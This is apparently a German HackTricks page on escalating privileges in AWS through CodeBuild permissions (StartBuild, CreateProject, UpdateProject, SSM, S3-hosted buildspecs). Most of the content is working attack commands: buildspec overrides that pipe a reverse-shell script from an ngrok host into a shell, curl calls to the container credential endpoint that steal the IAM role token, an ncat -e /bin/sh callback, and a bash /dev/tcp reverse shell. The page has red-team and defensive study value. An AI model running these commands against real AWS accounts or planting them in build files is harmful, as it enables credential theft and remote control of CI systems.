AWS - Codebuild Privesc

Reading time: 9 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

codebuild

Weitere Informationen:

AWS - Codebuild Enum

codebuild:StartBuild | codebuild:StartBuildBatch

Nur mit einer dieser Berechtigungen reicht es aus, einen Build mit einem neuen buildspec auszulösen und das Token der dem Projekt zugewiesenen IAM-Rolle zu stehlen:

bash
cat > /tmp/buildspec.yml <<EOF
version: 0.2

phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF

aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml

Hinweis: Der Unterschied zwischen diesen beiden Befehlen ist, dass:

  • StartBuild startet einen einzelnen Build-Job unter Verwendung einer spezifischen buildspec.yml.
  • StartBuildBatch erlaubt es, ein Batch von Builds zu starten, mit komplexeren Konfigurationen (z. B. mehrere Builds parallel auszuführen).

Potentielle Auswirkung: Direktes privesc auf angehängte AWS Codebuild-Rollen.

iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Ein Angreifer mit den iam:PassRole, codebuild:CreateProject und codebuild:StartBuild oder codebuild:StartBuildBatch Berechtigungen wäre in der Lage, durch das Erstellen eines laufenden Builds einen privesc auf jede codebuild IAM-Rolle zu erreichen.

bash
# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"


REV_PATH="/tmp/rev.json"

printf "$JSON" > $REV_PATH

# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

# Build it
aws codebuild start-build --project-name codebuild-demo-project

# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output

# Delete the project
aws codebuild delete-project --name codebuild-demo-project

Mögliche Auswirkungen: Direkter privesc auf jede AWS Codebuild-Rolle.

warning

In einem Codebuild container enthält die Datei /codebuild/output/tmp/env.sh alle env vars, die benötigt werden, um auf die Metadaten-Zugangsdaten zuzugreifen.

Diese Datei enthält die env variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, die den URL-Pfad für den Zugriff auf die Zugangsdaten enthält. Er sieht ungefähr so aus: /v2/credentials/2817702c-efcf-4485-9730-8e54303ec420

Füge das an die URL http://169.254.170.2/ an und du kannst die Rollen-Zugangsdaten auslesen.

Außerdem enthält sie die env variable ECS_CONTAINER_METADATA_URI, die die vollständige URL liefert, um Metadaten zum Container abzurufen.

iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Wie im vorherigen Abschnitt: Wenn du statt ein neues Build-Projekt zu erstellen ein vorhandenes Projekt modifizieren kannst, kannst du die IAM-Rolle angeben und das Token stehlen.

bash
REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"

# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"

printf "$JSON" > $REV_PATH

aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potential Impact: Direkter privesc auf jede AWS Codebuild-Rolle.

codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)

Wie im vorherigen Abschnitt, jedoch ohne die iam:PassRole-Berechtigung, kannst du diese Berechtigungen ausnutzen, um bestehende Codebuild-Projekte zu modifizieren und auf die Rolle zuzugreifen, die ihnen bereits zugewiesen ist.

sh
REV_PATH="/tmp/codebuild_pwn.json"

# Enumerate then env and get creds
REV="env\\\\n      - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"

JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n  build:\\\\n    commands:\\\\n      - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"

# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!

printf "$JSON" > $REV_PATH

aws codebuild update-project --cli-input-json file://$REV_PATH

aws codebuild start-build --project-name codebuild-demo-project

Potentielle Auswirkung: Direkter privesc auf angeschlossene AWS Codebuild-Rollen.

SSM

Mit genügenden Berechtigungen, um eine ssm session zu starten, ist es möglich, in ein Codebuild-Projekt zu gelangen, das gerade gebaut wird.

Das Codebuild-Projekt muss einen breakpoint enthalten:

phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
      - codebuild-breakpoint

Und dann:

bash
aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>

Für weitere Informationen siehe die Dokumentation.

(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject

Ein Angreifer, der einen Build eines bestimmten CodeBuild-Projekts starten oder neu starten kann, das seine buildspec.yml-Datei in einem S3-Bucket speichert, auf den der Angreifer Schreibzugriff hat, kann Befehlsausführung im CodeBuild-Prozess erlangen.

Hinweis: Die Eskalation ist nur relevant, wenn der CodeBuild-Worker eine andere Rolle hat — idealerweise mit höheren Rechten — als die des Angreifers.

bash
aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./

vim ./buildspec.yml

# Add the following lines in the "phases > pre_builds > commands" section
#
#    - apt-get install nmap -y
#    - ncat <IP> <PORT> -e /bin/sh

aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml

aws codebuild start-build --project-name <project-name>

# Wait for the reverse shell :)

Sie können so etwas wie dieses buildspec verwenden, um eine reverse shell zu erhalten:

buildspec.yml
version: 0.2

phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1

Auswirkung: Direkter privesc auf die Rolle, die vom AWS CodeBuild worker verwendet wird und normalerweise hohe Privilegien besitzt.

warning

Beachten Sie, dass das buildspec möglicherweise im ZIP-Format erwartet wird, sodass ein Angreifer es herunterladen, entpacken, die buildspec.yml aus dem Stammverzeichnis ändern, wieder zippen und hochladen müsste

Mehr Details finden sich hier.

Potenzielle Auswirkung: Direkter privesc auf angehängte AWS Codebuild-Rollen.

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks